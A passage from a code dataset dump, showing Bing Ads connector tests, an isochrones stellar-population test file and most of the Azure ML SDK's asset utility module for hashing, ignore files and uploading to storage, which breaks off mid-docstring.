}
@patch.object(source_bing_ads.source, "Client")
def test_ads_stream_slices(mocked_client, config):
ads = Ads(mocked_client, config)
with patch.object(
AdGroups,
"stream_slices",
return_value=iter([{"account_id": 180519267, "customer_id": 100}, {"account_id": 180278106, "customer_id": 200}]),
):
with patch.object(AdGroups, "read_records", side_effect=[iter([{"Id": 11}, {"Id": 22}]), iter([{"Id": 55}, {"Id": 66}])]):
slices = ads.stream_slices()
assert list(slices) == [
{"ad_group_id": 11, "account_id": 180519267, "customer_id": 100},
{"ad_group_id": 22, "account_id": 180519267, "customer_id": 100},
{"ad_group_id": 55, "account_id": 180278106, "customer_id": 200},
{"ad_group_id": 66, "account_id": 180278106, "customer_id": 200},
]
@patch.object(source_bing_ads.source, "Client")
def test_AccountPerformanceReportMonthly_request_params(mocked_client, config):
accountperformancereportmonthly = AccountPerformanceReportMonthly(mocked_client, config)
request_params = accountperformancereportmonthly.request_params(account_id=180278106)
del request_params["report_request"]
assert request_params == {
"overwrite_result_file": True,
# 'report_request': <MagicMock name='Client.get_service().factory.create()' id='140040029053232'>,
"result_file_directory": "/tmp",
"result_file_name": "AccountPerformanceReport",
"timeout_in_milliseconds": 300000,
}
@patch.object(source_bing_ads.source, "Client")
def test_accounts(mocked_client, config):
accounts = Accounts(mocked_client, config)
_ = list(accounts.read_records(SyncMode.full_refresh))
mocked_client.request.assert_called_once()
Row 6:
- blob_id: 39a462245e72d3380ffbaf3eef406fb6b452c2df
- directory_id: 1cfb0aca5ab2746ff3dacf554411f326beb0676e
- path: /isochrones/tests/test_populations.py
- content_id: 099ad3da9cb1642896884eb63fd6f7874c5eacfb
- detected_licenses: ["MIT"]
- license_type: permissive
- repo_name: timothydmorton/isochrones
- snapshot_id: b8cd9e7b41aa21459ba1459a07092fca10f5443a
- revision_id: 1627b4dda2845c362c0dcb4b140b4278fc916034
- branch_name: refs/heads/master
- visit_date: 2022-11-05T04:26:24.415865
- revision_date: 2021-12-06T06:02:34
- committer_date: 2021-12-06T06:02:34
- github_id: 19,379,027
- star_events_count: 113
- fork_events_count: 72
- gha_license_id: MIT
- gha_event_created_at: 2023-01-13T17:51:40
- gha_created_at: 2014-05-02T15:14:25
- gha_language: Jupyter Notebook
- src_encoding: UTF-8
- language: Python
- is_vendor: false
- is_generated: false
- length_bytes: 3,045
- extension: py
- filename: test_populations.py
- content:
import unittest
from pandas.testing import assert_frame_equal
from scipy.stats import uniform, norm
from isochrones import get_ichrone
from isochrones.priors import ChabrierPrior, FehPrior, GaussianPrior, SalpeterPrior, DistancePrior, AVPrior
from isochrones.populations import StarFormationHistory, StarPopulation, BinaryDistribution, deredden
def old_deredden(ic, pop, accurate=False, **kwargs):
"""Old version of deredden that regenerates population from scratch with AV=0
"""
return ic.generate_binary(
pop["initial_mass_0"].values,
pop["initial_mass_1"].values,
pop["requested_age_0"].values,
pop["initial_feh_0"].values,
distance=pop["distance_0"].values,
AV=0.0,
all_As=True,
accurate=accurate,
**kwargs,
)
class PopulationTest(unittest.TestCase):
def setUp(self):
mist = get_ichrone("mist")
sfh = StarFormationHistory() # Constant SFR for 10 Gyr; or, e.g., dist=norm(3, 0.2)
imf = SalpeterPrior(bounds=(0.4, 10)) # bounds on solar masses
fB = 0.4
gamma = 0.3
feh = GaussianPrior(-0.2, 0.2)
distance = DistancePrior(max_distance=3000) # pc
AV = AVPrior(bounds=[0, 2])
pop = StarPopulation(mist, imf=imf, fB=fB, gamma=gamma, sfh=sfh, feh=feh, distance=distance, AV=AV)
self.pop = pop
self.mist = mist
self.df = pop.generate(1000)
self.dereddened_df = deredden(self.df)
def test_old_deredden(self):
"""Test dereddening against version that regenerates population
"""
old_dereddened_df = old_deredden(self.mist, self.df)
assert_frame_equal(self.dereddened_df.fillna(0), old_dereddened_df.fillna(0))
def test_mags(self):
"""Check no total mags are null
"""
mags = [f"{b}_mag" for b in self.mist.bands]
assert self.df[mags].isnull().sum().sum() == 0
def test_dereddening(self):
"""Check mass, age, feh the same when dereddened
"""
cols = ["initial_mass_0", "initial_feh_0", "requested_age_0"]
assert_frame_equal(self.df[cols], self.dereddened_df[cols])
# Check de-reddening vis-a-vis A_x
for b in self.mist.bands:
diff = (self.dereddened_df[f"{b}_mag"] + self.df[f"A_{b}_0"]) - self.df[f"{b}_mag"]
is_binary = self.df.mass_1 > 0
assert diff.loc[~is_binary].std() < 0.0001
def test_extinction(self):
from numpy.testing import assert_array_almost_equal
from isochrones.utils import addmags
import numpy as np
assert_array_almost_equal(
self.df["G_mag"],
addmags(
self.dereddened_df["G_mag_0"] + self.df["A_G_0"],
(self.dereddened_df["G_mag_1"] + self.df["A_G_1"]).fillna(np.inf),
),
)
def test_generate(self):
"""Make sure corner case when regenerating 1 doesn't break.
"""
for i in range(10):
self.pop.generate(10)
Row 7:
- blob_id: 0cbc04f7c6ad965d5bb38208a4edcf072e19a528
- directory_id: f576f0ea3725d54bd2551883901b25b863fe6688
- path: /sdk/ml/azure-ai-ml/azure/ai/ml/_utils/_asset_utils.py
- content_id: bc302cf35c9f312e02609c479714ad6c7ea32d0b
- detected_licenses: ["LicenseRef-scancode-generic-cla", "LicenseRef-scancode-python-cwi", "LGPL-2.1-or-later", "PSF-2.0", "LGPL-2.0-or-later", "GPL-3.0-or-later", "GPL-1.0-or-later", "LicenseRef-scancode-warranty-disclaimer", "LGPL-2.1-only", "Python-2.0", "MPL-2.0", "LicenseRef-scancode-other-copyleft", "HPND", "ODbL-1.0", "GPL-3.0-only", "ZPL-2.1", "MIT", "Apache-2.0", "BSD-2-Clause", "BSD-3-Clause", "LicenseRef-scancode-free-unknown"]
- license_type: permissive
- repo_name: Azure/azure-sdk-for-python
- snapshot_id: 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
- revision_id: c2ca191e736bb06bfbbbc9493e8325763ba990bb
- branch_name: refs/heads/main
- visit_date: 2023-09-06T09:30:13.135012
- revision_date: 2023-09-06T01:08:06
- committer_date: 2023-09-06T01:08:06
- github_id: 4,127,088
- star_events_count: 4,046
- fork_events_count: 2,755
- gha_license_id: MIT
- gha_event_created_at: 2023-09-14T21:48:49
- gha_created_at: 2012-04-24T16:46:12
- gha_language: Python
- src_encoding: UTF-8
- language: Python
- is_vendor: false
- is_generated: false
- length_bytes: 42,111
- extension: py
- filename: _asset_utils.py
- content:
# ---------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# ---------------------------------------------------------
# pylint: disable=protected-access,too-many-lines
import hashlib
import logging
import os
import uuid
import warnings
from concurrent.futures import ThreadPoolExecutor, as_completed
from contextlib import suppress
from multiprocessing import cpu_count
from os import PathLike
from pathlib import Path
from platform import system
from typing import TYPE_CHECKING, Any, Dict, Iterable, List, Optional, Tuple, Union, cast
from colorama import Fore
from tqdm import TqdmWarning, tqdm
from typing_extensions import Literal
from azure.ai.ml._artifacts._constants import (
AML_IGNORE_FILE_NAME,
ARTIFACT_ORIGIN,
AUTO_DELETE_SETTING_NOT_ALLOWED_ERROR_NO_PERSONAL_DATA,
BLOB_STORAGE_CLIENT_NAME,
CHUNK_SIZE,
DEFAULT_CONNECTION_TIMEOUT,
EMPTY_DIRECTORY_ERROR,
GEN2_STORAGE_CLIENT_NAME,
GIT_IGNORE_FILE_NAME,
INVALID_MANAGED_DATASTORE_PATH_ERROR_NO_PERSONAL_DATA,
MAX_CONCURRENCY,
PROCESSES_PER_CORE,
UPLOAD_CONFIRMATION,
WORKSPACE_MANAGED_DATASTORE,
WORKSPACE_MANAGED_DATASTORE_WITH_SLASH,
)
from azure.ai.ml._restclient.v2022_02_01_preview.operations import ( # pylint: disable = unused-import
ComponentContainersOperations,
ComponentVersionsOperations,
DataContainersOperations,
DataVersionsOperations,
EnvironmentContainersOperations,
EnvironmentVersionsOperations,
ModelContainersOperations,
ModelVersionsOperations,
)
from azure.ai.ml._restclient.v2022_05_01.models import (
DataVersionBaseData,
ModelVersionData,
ModelVersionResourceArmPaginatedResult,
)
from azure.ai.ml._restclient.v2023_04_01.models import PendingUploadRequestDto
from azure.ai.ml._utils._pathspec import GitWildMatchPattern, normalize_file
from azure.ai.ml._utils.utils import convert_windows_path_to_unix, retry, snake_to_camel
from azure.ai.ml.constants._common import MAX_AUTOINCREMENT_ATTEMPTS, DefaultOpenEncoding, OrderString
from azure.ai.ml.entities._assets.asset import Asset
from azure.ai.ml.exceptions import (
AssetPathException,
EmptyDirectoryError,
ErrorCategory,
ErrorTarget,
ValidationErrorType,
ValidationException,
)
from azure.core.exceptions import ResourceExistsError, ResourceNotFoundError
if TYPE_CHECKING:
from azure.ai.ml.operations import ComponentOperations, DataOperations, EnvironmentOperations, ModelOperations
hash_type = type(hashlib.md5()) # nosec
module_logger = logging.getLogger(__name__)
class AssetNotChangedError(Exception):
pass
class IgnoreFile(object):
def __init__(self, file_path: Optional[Union[str, os.PathLike]] = None):
"""Base class for handling .gitignore and .amlignore files.
:param file_path: Relative path, or absolute path to the ignore file.
"""
path = Path(file_path).resolve() if file_path else None
self._path = path
self._path_spec = None
def exists(self) -> bool:
"""Checks if ignore file exists.
:return: True if file exists. False Otherwise
:rtype: bool
"""
return self._file_exists()
def _file_exists(self) -> bool:
        return bool(self._path and self._path.exists())
@property
def base_path(self) -> Path:
return self._path.parent
def _get_ignore_list(self) -> List[str]:
"""Get ignore list from ignore file contents.
:return: The lines of the ignore file
:rtype: List[str]
"""
if not self.exists():
return []
if self._file_exists():
with open(self._path, "r", encoding=DefaultOpenEncoding.READ) as fh:
return [line.rstrip() for line in fh if line]
return []
def _create_pathspec(self) -> List[GitWildMatchPattern]:
"""Creates path specification based on ignore list.
:return: Path specification
:rtype: List[GitWildMatchPattern]
"""
return [GitWildMatchPattern(ignore) for ignore in self._get_ignore_list()]
def _get_rel_path(self, file_path: Union[str, os.PathLike]) -> Optional[str]:
"""Get relative path of given file_path.
:param file_path: A file path
:type file_path: Union[str, os.PathLike]
:return: file_path relative to base_path, if computable. None otherwise
:rtype: Optional[str]
"""
file_path = Path(file_path).absolute()
try:
# use os.path.relpath instead of Path.relative_to in case file_path is not a child of self.base_path
return os.path.relpath(file_path, self.base_path)
except ValueError:
# 2 paths are on different drives
return None
def is_file_excluded(self, file_path: Union[str, os.PathLike]) -> bool:
"""Checks if given file_path is excluded.
:param file_path: File path to be checked against ignore file specifications
:type file_path: Union[str, os.PathLike]
:return: Whether the file is excluded by ignore file
:rtype: bool
"""
# TODO: current design of ignore file can't distinguish between files and directories of the same name
if self._path_spec is None:
self._path_spec = self._create_pathspec()
if not self._path_spec:
return False
file_path = self._get_rel_path(file_path)
if file_path is None:
return True
norm_file = normalize_file(file_path)
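        # gitignore semantics: the *last* matching pattern wins, and a negation
        # pattern ("!foo") has include=False, re-including a previously
        # excluded file.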
matched = False
for pattern in self._path_spec:
if pattern.include is not None:
if pattern.match_file(norm_file) is not None:
matched = pattern.include
return matched
@property
def path(self) -> Union[Path, str]:
return self._path
class AmlIgnoreFile(IgnoreFile):
def __init__(self, directory_path: Union[Path, str]):
file_path = Path(directory_path).joinpath(AML_IGNORE_FILE_NAME)
super(AmlIgnoreFile, self).__init__(file_path)
class GitIgnoreFile(IgnoreFile):
def __init__(self, directory_path: Union[Path, str]):
file_path = Path(directory_path).joinpath(GIT_IGNORE_FILE_NAME)
super(GitIgnoreFile, self).__init__(file_path)
def get_ignore_file(directory_path: Union[Path, str]) -> IgnoreFile:
"""Finds and returns IgnoreFile object based on ignore file found in directory_path.
.amlignore takes precedence over .gitignore and if no file is found, an empty
IgnoreFile object will be returned.
The ignore file must be in the root directory.
:param directory_path: Path to the (root) directory where ignore file is located
:type directory_path: Union[Path, str]
:return: The IgnoreFile found in the directory
:rtype: IgnoreFile
"""
aml_ignore = AmlIgnoreFile(directory_path)
git_ignore = GitIgnoreFile(directory_path)
if aml_ignore.exists():
return aml_ignore
if git_ignore.exists():
return git_ignore
return IgnoreFile()
def _validate_path(path: Union[str, os.PathLike], _type: str) -> None:
path = Path(path) # Okay to do this since Path is idempotent
if not path.is_file() and not path.is_dir():
raise ValidationException(
message=f"No such file or directory: {path}",
target=_type,
error_type=ValidationErrorType.FILE_OR_FOLDER_NOT_FOUND,
no_personal_data_message="No such file or directory",
error_category=ErrorCategory.USER_ERROR,
)
def _parse_name_version(
name: Optional[str] = None, version_as_int: bool = True
) -> Tuple[Optional[str], Optional[Union[str, int]]]:
if not name:
return None, None
token_list = name.split(":")
if len(token_list) == 1:
return name, None
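    # Only the token after the last ":" is the version; everything before it is
    # rejoined, e.g. "my:asset:3" parses to ("my:asset", 3).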
*name, version = token_list
if version_as_int:
version = int(version)
return ":".join(name), version
def _get_file_hash(filename: Union[str, os.PathLike], _hash: hash_type) -> hash_type:
with open(str(filename), "rb") as f:
for chunk in iter(lambda: f.read(CHUNK_SIZE), b""):
_hash.update(chunk)
return _hash
def _get_dir_hash(directory: Union[str, os.PathLike], _hash: hash_type, ignore_file: IgnoreFile) -> hash_type:
dir_contents = Path(directory).iterdir()
sorted_contents = sorted(dir_contents, key=lambda path: str(path).lower())
for path in sorted_contents:
if ignore_file.is_file_excluded(path):
continue
_hash.update(path.name.encode())
if os.path.islink(path): # ensure we're hashing the contents of the linked file
path = _resolve_path(path)
if path.is_file():
_hash = _get_file_hash(path, _hash)
elif path.is_dir():
_hash = _get_dir_hash(path, _hash, ignore_file)
return _hash
def _build_metadata_dict(name: str, version: str) -> Dict[str, str]:
"""Build metadata dictionary to attach to uploaded data.
Metadata includes an upload confirmation field, and for code uploads only, the name and version of the code asset
being created for that data.
:param name: The name of the uploaded data
:type name: str
:param version: The version of the uploaded data
:type version: str
:return: Metadata dict
:rtype: Dict[str, str]
"""
if name:
linked_asset_arm_id = {"name": name, "version": version}
else:
msg = "'name' cannot be NoneType for asset artifact upload."
raise ValidationException(
message=msg,
no_personal_data_message=msg,
target=ErrorTarget.ASSET,
error_category=ErrorCategory.USER_ERROR,
error_type=ValidationErrorType.INVALID_VALUE,
)
metadata_dict = {**UPLOAD_CONFIRMATION, **linked_asset_arm_id}
return metadata_dict
def get_object_hash(path: Union[str, os.PathLike], ignore_file: IgnoreFile = IgnoreFile()) -> str:
_hash = hashlib.md5(b"Initialize for october 2021 AML CLI version") # nosec
if Path(path).is_dir():
object_hash = _get_dir_hash(directory=path, _hash=_hash, ignore_file=ignore_file)
else:
if os.path.islink(path): # ensure we're hashing the contents of the linked file
path = _resolve_path(Path(path))
object_hash = _get_file_hash(filename=path, _hash=_hash)
return str(object_hash.hexdigest())
def get_content_hash_version():
return 202208
def get_content_hash(path: Union[str, os.PathLike], ignore_file: IgnoreFile = IgnoreFile()) -> Optional[str]:
"""Generating sha256 hash for file/folder,
e.g. Code snapshot fingerprints to prevent tampering.
The process of hashing is:
1. If it's a link, get the actual path of the link.
2. If it's a file, append file content.
3. If it's a folder:
1. list all files under the folder
2. convert file count to str and append to hash
3. sort the files by lower case of relative path
4. for each file append '#'+relative path+'#' and file size to hash
5. do another iteration on file list to append each files content to hash.
The example of absolute path to relative path mapping is:
[
('/mnt/c/codehash/code/file1.txt', 'file1.txt'),
('/mnt/c/codehash/code/folder1/file1.txt', 'folder1/file1.txt'),
('/mnt/c/codehash/code/Folder2/file1.txt', 'Folder2/file1.txt'),
('/mnt/c/codehash/code/Folder2/folder1/file1.txt', 'Folder2/folder1/file1.txt')
]
4. Hash the content and convert to hex digest string.
    :param path: The file or folder to hash
    :type path: Union[str, os.PathLike]
    :param ignore_file: An ignore file that specifies files to ignore when computing the hash
    :type ignore_file: IgnoreFile
:return: The content hash if the content is a link, directory, or file. None otherwise
:rtype: Optional[str]
"""
# DO NOT change this function unless you change the verification logic together
actual_path = path
if os.path.islink(path):
actual_path = _resolve_path(Path(path)).as_posix()
if os.path.isdir(actual_path):
return _get_file_list_content_hash(get_upload_files_from_folder(actual_path, ignore_file=ignore_file))
if os.path.isfile(actual_path):
return _get_file_list_content_hash([(actual_path, Path(actual_path).name)])
return None
def get_upload_files_from_folder(
path: Union[str, os.PathLike], *, prefix: str = "", ignore_file: IgnoreFile = IgnoreFile()
) -> List[str]:
path = Path(path)
upload_paths = []
for root, _, files in os.walk(path, followlinks=True):
upload_paths += list(
traverse_directory(
root,
files,
prefix=Path(prefix).joinpath(Path(root).relative_to(path)).as_posix(),
ignore_file=ignore_file,
)
)
return upload_paths
def _get_file_list_content_hash(file_list) -> str:
# file_list is a list of tuples, (absolute_path, relative_path)
_hash = hashlib.sha256()
# Add file count to the hash and add '#' around file name then add each file's size to avoid collision like:
# Case 1:
# 'a.txt' with contents 'a'
# 'b.txt' with contents 'b'
#
# Case 2:
# cspell:disable-next-line
# 'a.txt' with contents 'ab.txtb'
_hash.update(str(len(file_list)).encode())
# Sort by "destination" path, since in this function destination prefix is empty and keep the link name in path.
for file_path, file_name in sorted(file_list, key=lambda x: str(x[1]).lower()):
_hash.update(("#" + file_name + "#").encode())
_hash.update(str(os.path.getsize(file_path)).encode())
for file_path, file_name in sorted(file_list, key=lambda x: str(x[1]).lower()):
_hash = _get_file_hash(file_path, _hash)
return str(_hash.hexdigest())
def traverse_directory( # pylint: disable=unused-argument
root: str,
files: List[str],
*,
prefix: str,
ignore_file: IgnoreFile = IgnoreFile(),
# keep this for backward compatibility
**kwargs: Any,
) -> Iterable[Tuple[str, Union[str, Any]]]:
"""Enumerate all files in the given directory and compose paths for them to be uploaded to in the remote storage.
e.g.
[/mnt/c/Users/dipeck/upload_files/my_file1.txt,
/mnt/c/Users/dipeck/upload_files/my_file2.txt] -->
[(/mnt/c/Users/dipeck/upload_files/my_file1.txt, LocalUpload/<guid>/upload_files/my_file1.txt),
(/mnt/c/Users/dipeck/upload_files/my_file2.txt, LocalUpload/<guid>/upload_files/my_file2.txt))]
:param root: Root directory path
:type root: str
:param files: List of all file paths in the directory
:type files: List[str]
:keyword prefix: Remote upload path for project directory (e.g. LocalUpload/<guid>/project_dir)
:paramtype prefix: str
:keyword ignore_file: The .amlignore or .gitignore file in the project directory
:paramtype ignore_file: azure.ai.ml._utils._asset_utils.IgnoreFile
:return: Zipped list of tuples representing the local path and remote destination path for each file
:rtype: Iterable[Tuple[str, Union[str, Any]]]
"""
    # Normalize Windows paths. Note that the path should be resolved first, as long path components are converted
    # to 8.3 short names in Windows. For example, C:\Users\too-long-user-name\test becomes C:\Users\too-lo~1\test by default.
# Refer to https://en.wikipedia.org/wiki/8.3_filename for more details.
root = Path(root).resolve().absolute()
# filter out files excluded by the ignore file
# TODO: inner ignore file won't take effect. A merged IgnoreFile need to be generated in code resolution.
origin_file_paths = [
root.joinpath(filename)
for filename in files
if not ignore_file.is_file_excluded(root.joinpath(filename).as_posix())
]
result = []
for origin_file_path in origin_file_paths:
relative_path = origin_file_path.relative_to(root)
result.append((_resolve_path(origin_file_path).as_posix(), Path(prefix).joinpath(relative_path).as_posix()))
return result
def _resolve_path(path: Path) -> Path:
if not path.is_symlink():
return path
link_path = path.resolve()
if not link_path.is_absolute():
link_path = path.parent.joinpath(link_path).resolve()
return _resolve_path(link_path)
def generate_asset_id(asset_hash: str, include_directory=True) -> str:
asset_id = asset_hash or str(uuid.uuid4())
if include_directory:
asset_id = "/".join((ARTIFACT_ORIGIN, asset_id))
return asset_id
def get_directory_size(
root: Union[str, os.PathLike], ignore_file: IgnoreFile = IgnoreFile(None)
) -> Tuple[int, Dict[str, int]]:
"""Returns total size of a directory and a dictionary itemizing each sub- path and its size.
If an optional ignore_file argument is provided, then files specified in the ignore file are not included in the
directory size calculation.
:param root: The directory to calculate the size of
:type root: Union[str, os.PathLike]
:param ignore_file: An ignore file that specifies files to ignore when computing the size
:type ignore_file: IgnoreFile
:return: The computed size of the directory, and the sizes of the child paths
:rtype: Tuple[int, Dict[str, int]]
"""
total_size = 0
size_list = {}
for dirpath, _, filenames in os.walk(root, followlinks=True):
for name in filenames:
full_path = os.path.join(dirpath, name)
# Don't count files that are excluded by an ignore file
if ignore_file.is_file_excluded(full_path):
continue
if not os.path.islink(full_path):
path_size = os.path.getsize(full_path)
else:
# ensure we're counting the size of the linked file
# os.readlink returns a file path relative to dirpath, and must be
# re-joined to get a workable result
path_size = os.path.getsize(os.path.join(dirpath, os.readlink(convert_windows_path_to_unix(full_path))))
size_list[full_path] = path_size
total_size += path_size
return total_size, size_list
def upload_file(
storage_client: Union["BlobStorageClient", "Gen2StorageClient"],
source: str,
dest: Optional[str] = None,
msg: Optional[str] = None,
size: int = 0,
show_progress: Optional[bool] = None,
in_directory: bool = False,
callback: Optional[Any] = None,
) -> None:
"""Upload a single file to remote storage.
:param storage_client: Storage client object
:type storage_client: Union[
azure.ai.ml._artifacts._blob_storage_helper.BlobStorageClient,
azure.ai.ml._artifacts._gen2_storage_helper.Gen2StorageClient]
:param source: Local path to project directory
:type source: str
:param dest: Remote upload path for project directory (e.g. LocalUpload/<guid>/project_dir)
:type dest: str
:param msg: Message to be shown with progress bar (e.g. "Uploading <source>")
:type msg: str
:param size: Size of the file in bytes
:type size: int
:param show_progress: Whether to show progress bar or not
:type show_progress: bool
:param in_directory: Whether the file is part of a directory of files
:type in_directory: bool
:param callback: Callback to progress bar
:type callback: Any
:return: None
"""
validate_content = size > 0 # don't do checksum for empty files
if (
type(storage_client).__name__ == GEN2_STORAGE_CLIENT_NAME
): # Only for Gen2StorageClient, Blob Storage doesn't have true directories
if in_directory:
storage_client.temp_sub_directory_client = None
file_name_tail = dest.split(os.path.sep)[-1]
# Indexing from 2 because the first two parts of the remote path will always be LocalUpload/<asset_id>
all_sub_folders = dest.split(os.path.sep)[2:-1]
# Create remote directories for each nested directory if file is in a nested directory
for sub_folder in all_sub_folders:
if storage_client.temp_sub_directory_client:
storage_client.temp_sub_directory_client = (
storage_client.temp_sub_directory_client.create_sub_directory(sub_folder)
)
else:
storage_client.temp_sub_directory_client = storage_client.directory_client.create_sub_directory(
sub_folder
)
storage_client.file_client = storage_client.temp_sub_directory_client.create_file(file_name_tail)
else:
storage_client.file_client = storage_client.directory_client.create_file(source.split("/")[-1])
with open(source, "rb") as data:
if show_progress and not in_directory:
file_size, _ = get_directory_size(source)
file_size_in_mb = file_size / 10**6
if file_size_in_mb < 1:
msg += Fore.GREEN + " (< 1 MB)"
else:
msg += Fore.GREEN + f" ({round(file_size_in_mb, 2)} MBs)"
cntx_manager = FileUploadProgressBar(msg=msg)
else:
cntx_manager = suppress()
with cntx_manager as c:
callback = c.update_to if (show_progress and not in_directory) else None
if type(storage_client).__name__ == GEN2_STORAGE_CLIENT_NAME:
storage_client.file_client.upload_data(
data=data.read(),
overwrite=True,
validate_content=validate_content,
raw_response_hook=callback,
max_concurrency=MAX_CONCURRENCY,
)
elif type(storage_client).__name__ == BLOB_STORAGE_CLIENT_NAME:
storage_client.container_client.upload_blob(
name=dest,
data=data,
validate_content=validate_content,
overwrite=storage_client.overwrite,
raw_response_hook=callback,
max_concurrency=MAX_CONCURRENCY,
connection_timeout=DEFAULT_CONNECTION_TIMEOUT,
)
storage_client.uploaded_file_count += 1
def upload_directory(
storage_client: Union["BlobStorageClient", "Gen2StorageClient"],
source: Union[str, os.PathLike],
dest: str,
msg: str,
show_progress: bool,
ignore_file: IgnoreFile,
) -> None:
"""Upload directory to remote storage.
:param storage_client: Storage client object
:type storage_client: Union[
azure.ai.ml._artifacts._blob_storage_helper.BlobStorageClient,
azure.ai.ml._artifacts._gen2_storage_helper.Gen2StorageClient]
:param source: Local path to project directory
:type source: Union[str, os.PathLike]
:param dest: Remote upload path for project directory (e.g. LocalUpload/<guid>/project_dir)
:type dest: str
:param msg: Message to be shown with progress bar (e.g. "Uploading <source>")
:type msg: str
:param show_progress: Whether to show progress bar or not
:type show_progress: bool
:param ignore_file: The .amlignore or .gitignore file in the project directory
:type ignore_file: azure.ai.ml._utils._asset_utils.IgnoreFile
:return: None
"""
source_path = Path(source).resolve()
prefix = "" if dest == "" else dest + "/"
prefix += os.path.basename(source_path) + "/"
if (
type(storage_client).__name__ == GEN2_STORAGE_CLIENT_NAME
): # Only for Gen2StorageClient, Blob Storage doesn't have true directories
storage_client.sub_directory_client = storage_client.directory_client.create_sub_directory(
prefix.strip("/").split("/")[-1]
)
# Enumerate all files in the given directory and compose paths for them to be uploaded to in the remote storage
upload_paths = get_upload_files_from_folder(
source_path,
prefix=prefix,
ignore_file=ignore_file,
)
size_dict = {}
total_size = 0
# Get each file's size for progress bar tracking
for path, _ in upload_paths:
# TODO: symbol links are already resolved
if os.path.islink(path):
path_size = os.path.getsize(
os.readlink(convert_windows_path_to_unix(path))
) # ensure we're counting the size of the linked file
else:
path_size = os.path.getsize(path)
size_dict[path] = path_size
total_size += path_size
upload_paths = sorted(upload_paths)
if len(upload_paths) == 0:
raise EmptyDirectoryError(
message=EMPTY_DIRECTORY_ERROR.format(source),
no_personal_data_message=msg.format("[source]"),
target=ErrorTarget.ARTIFACT,
error_category=ErrorCategory.USER_ERROR,
)
storage_client.total_file_count = len(upload_paths)
    if (
        type(storage_client).__name__ == BLOB_STORAGE_CLIENT_NAME
    ):  # Only for BlobStorageClient
# Azure Blob doesn't allow metadata setting at the directory level, so the first
# file in the directory is designated as the file where the confirmation metadata
# will be added at the end of the upload.
storage_client.indicator_file = upload_paths[0][1]
storage_client.check_blob_exists()
# Submit paths to workers for upload
num_cores = int(cpu_count()) * PROCESSES_PER_CORE
with ThreadPoolExecutor(max_workers=num_cores) as ex:
futures_dict = {
ex.submit(
upload_file,
storage_client=storage_client,
source=src,
dest=dest,
size=size_dict.get(src),
in_directory=True,
show_progress=show_progress,
): (src, dest)
for (src, dest) in upload_paths
}
if show_progress:
warnings.simplefilter("ignore", category=TqdmWarning)
msg += f" ({round(total_size/10**6, 2)} MBs)"
is_windows = system() == "Windows" # Default unicode progress bar doesn't display well on Windows
with tqdm(total=total_size, desc=msg, ascii=is_windows) as pbar:
for future in as_completed(futures_dict):
future.result() # access result to propagate any exceptions
file_path_name = futures_dict[future][0]
pbar.update(size_dict.get(file_path_name) or 0)
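# --- Hedged sketch (not part of the original module) -----------------------
# The aggregate-progress pattern above in isolation: submit one future per
# file, then advance a single tqdm bar by each file's size as its future
# completes. The sizes and the fake worker below are invented.
def _demo_parallel_upload_progress() -> None:
    import time
    from concurrent.futures import ThreadPoolExecutor, as_completed
    from tqdm import tqdm

    sizes = {"a.txt": 10, "b.txt": 30, "c.txt": 60}  # hypothetical byte counts

    def fake_upload(name: str) -> str:
        time.sleep(0.01)
        return name

    with ThreadPoolExecutor(max_workers=3) as ex:
        futures = {ex.submit(fake_upload, name): name for name in sizes}
        with tqdm(total=sum(sizes.values())) as pbar:
            for future in as_completed(futures):
                future.result()  # re-raise any worker exception here
                pbar.update(sizes[futures[future]])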
@retry(
exceptions=ResourceExistsError,
failure_msg="Asset creation exceeded maximum retries.",
logger=module_logger,
max_attempts=MAX_AUTOINCREMENT_ATTEMPTS,
)
def _create_or_update_autoincrement(
name: str,
body: Any,
version_operation: Any,
container_operation: Any,
resource_group_name: str,
workspace_name: str,
**kwargs,
) -> Any:
try:
container = container_operation.get(
name=name,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
**kwargs,
)
version = container.properties.next_version
except ResourceNotFoundError:
version = "1"
result = version_operation.create_or_update(
name=name,
version=version,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
body=body,
**kwargs,
)
return result
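# --- Hedged sketch (not part of the original module) -----------------------
# A minimal stand-in for the @retry decorator used above: call `fn`, retry on
# the given exception type, and re-raise once max_attempts is exhausted. The
# real decorator in this codebase also logs a failure message; this sketch
# only captures the control flow.
def _demo_retry(fn, exc_type, max_attempts: int = 5):
    for attempt in range(1, max_attempts + 1):
        try:
            return fn()
        except exc_type:
            if attempt == max_attempts:
                raise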
def _get_next_version_from_container(
name: str,
container_operation: Any,
resource_group_name: str,
workspace_name: str,
registry_name: str = None,
**kwargs,
) -> str:
try:
container = (
container_operation.get(
name=name,
resource_group_name=resource_group_name,
registry_name=registry_name,
**kwargs,
)
if registry_name
else container_operation.get(
name=name,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
**kwargs,
)
)
version = container.properties.next_version
except ResourceNotFoundError:
version = "1"
return version
def _get_latest_version_from_container(
asset_name: str,
container_operation: Any,
resource_group_name: str,
workspace_name: Optional[str] = None,
registry_name: Optional[str] = None,
**kwargs,
) -> str:
try:
container = (
container_operation.get(
name=asset_name,
resource_group_name=resource_group_name,
registry_name=registry_name,
**kwargs,
)
if registry_name
else container_operation.get(
name=asset_name,
resource_group_name=resource_group_name,
workspace_name=workspace_name,
**kwargs,
)
)
version = container.properties.latest_version
except ResourceNotFoundError as e:
message = (
f"Asset {asset_name} does not exist in registry {registry_name}."
if registry_name
else f"Asset {asset_name} does not exist in workspace {workspace_name}."
)
no_personal_data_message = (
"Asset {asset_name} does not exist in registry {registry_name}."
if registry_name
else "Asset {asset_name} does not exist in workspace {workspace_name}."
)
raise ValidationException(
message=message,
no_personal_data_message=no_personal_data_message,
target=ErrorTarget.ASSET,
error_category=ErrorCategory.USER_ERROR,
error_type=ValidationErrorType.RESOURCE_NOT_FOUND,
) from e
return version
def _get_latest(
asset_name: str,
version_operation: Any,
resource_group_name: str,
workspace_name: Optional[str] = None,
registry_name: Optional[str] = None,
order_by: Literal[OrderString.CREATED_AT, OrderString.CREATED_AT_DESC] = OrderString.CREATED_AT_DESC,
**kwargs,
) -> Union[ModelVersionData, DataVersionBaseData]:
"""Retrieve the latest version of the asset with the given name.
Latest is defined as the most recently created, not the most recently updated.
:param asset_name: The asset name
:type asset_name: str
:param version_operation: Any
:type version_operation: Any
:param resource_group_name: The resource group name
:type resource_group_name: str
:param workspace_name: The workspace name
:type workspace_name: Optional[str]
:param registry_name: The registry name
:type registry_name: Optional[str]
